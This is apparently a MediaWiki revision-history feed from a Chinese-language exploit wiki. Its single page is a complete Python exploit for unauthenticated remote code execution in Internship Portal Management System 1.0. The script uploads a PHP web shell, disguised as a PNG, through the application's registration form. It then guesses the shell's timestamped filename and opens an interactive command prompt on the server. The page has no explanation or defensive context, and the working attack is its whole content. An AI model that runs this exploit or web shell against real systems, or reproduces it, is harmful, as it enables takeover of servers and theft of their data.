<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Internship_Portal_Management_System_1.0_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>Internship Portal Management System 1.0 未經身份驗證文件上傳&amp;任意代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Internship_Portal_Management_System_1.0_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Internship_Portal_Management_System_1.0_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-11T01:38:42Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Internship_Portal_Management_System_1.0_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2215&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) # Date: 2021-05-04 # Exploit Author: argeneste...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Internship_Portal_Management_System_1.0_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2215&amp;oldid=prev"/>
		<updated>2021-05-04T08:30:14Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) # Date: 2021-05-04 # Exploit Author: argeneste...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)&lt;br /&gt;
# Date: 2021-05-04&lt;br /&gt;
# Exploit Author: argenestel&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&amp;amp;title=Internship+Portal+Management+System+using+PHP+with+Source+Code&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: Debian 10&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
#change the url to the site running the vulnerable system&lt;br /&gt;
url=&amp;quot;http://127.0.0.1:4000&amp;quot;&lt;br /&gt;
#burp proxy&lt;br /&gt;
proxies = {&lt;br /&gt;
 &amp;quot;http&amp;quot;: &amp;quot;http://127.0.0.1:8080&amp;quot;,&lt;br /&gt;
}&lt;br /&gt;
#payload&lt;br /&gt;
payload='&amp;lt;?php if(isset($_REQUEST[\'cmd\'])){ echo &amp;quot;&amp;lt;pre&amp;gt;&amp;quot;; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo &amp;quot;&amp;lt;/pre&amp;gt;&amp;quot;; die; }?&amp;gt;'&lt;br /&gt;
&lt;br /&gt;
#the upload point&lt;br /&gt;
insert_url=url+&amp;quot;/inserty.php&amp;quot;&lt;br /&gt;
&lt;br /&gt;
def fill_details():&lt;br /&gt;
    global payload&lt;br /&gt;
    global shellend&lt;br /&gt;
    global shellstart&lt;br /&gt;
    print(&amp;quot;Online Intern System 1.0 Exploit: Unauth RCE via File Upload&amp;quot;)&lt;br /&gt;
    #time start&lt;br /&gt;
    shellstart=int(time.time())&lt;br /&gt;
    #print(shellstart)&lt;br /&gt;
    files  = {'file':('shell.php',payload,&lt;br /&gt;
                    'image/png', {'Content-Disposition': 'form-data'}&lt;br /&gt;
                  )&lt;br /&gt;
              }&lt;br /&gt;
    data = {&lt;br /&gt;
            &amp;quot;company_name&amp;quot;:&amp;quot;some&amp;quot;,&lt;br /&gt;
            &amp;quot;first_name&amp;quot;:&amp;quot;some&amp;quot;,&lt;br /&gt;
            &amp;quot;last_name&amp;quot;:&amp;quot;some&amp;quot;,&lt;br /&gt;
            &amp;quot;email&amp;quot;:&amp;quot;some@some.com&amp;quot;,&lt;br /&gt;
            &amp;quot;gender&amp;quot;:&amp;quot;Male&amp;quot;,&lt;br /&gt;
            &amp;quot;insert_button&amp;quot;:&amp;quot;Apply&amp;quot;,&lt;br /&gt;
            &amp;quot;terms&amp;quot;:&amp;quot;on&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    r = requests.post(insert_url, data=data, files=files)&lt;br /&gt;
    if r.status_code == 200:&lt;br /&gt;
        print(&amp;quot;Exploited Intern System Successfully...&amp;quot;)&lt;br /&gt;
        shellend = int(time.time())&lt;br /&gt;
        #print(shellend)&lt;br /&gt;
        shell()&lt;br /&gt;
    else:&lt;br /&gt;
        print(&amp;quot;Exploit Failed&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
def shell():&lt;br /&gt;
    for shellname in range(shellstart, shellend+1):&lt;br /&gt;
        shellstr=str(shellname)&lt;br /&gt;
        shell_url=url+&amp;quot;/upload/&amp;quot;+shellstr+&amp;quot;_shell.php&amp;quot;&lt;br /&gt;
        r = requests.get(shell_url)&lt;br /&gt;
        if r.status_code == 200:&lt;br /&gt;
            shell_url=url+&amp;quot;/upload/&amp;quot;+shellstr+&amp;quot;_shell.php&amp;quot;&lt;br /&gt;
            break&lt;br /&gt;
    &lt;br /&gt;
    r = requests.get(shell_url)&lt;br /&gt;
    if r.status_code == 200:&lt;br /&gt;
        print(&amp;quot;Shell Starting...&amp;quot;)&lt;br /&gt;
        while True:&lt;br /&gt;
            cmd=input(&amp;quot;cmd$ &amp;quot;)&lt;br /&gt;
            r = requests.get(shell_url+&amp;quot;?cmd=&amp;quot;+cmd)&lt;br /&gt;
            print(r.text)&lt;br /&gt;
    else:&lt;br /&gt;
        print(&amp;quot;File Name Error&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
fill_details()&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>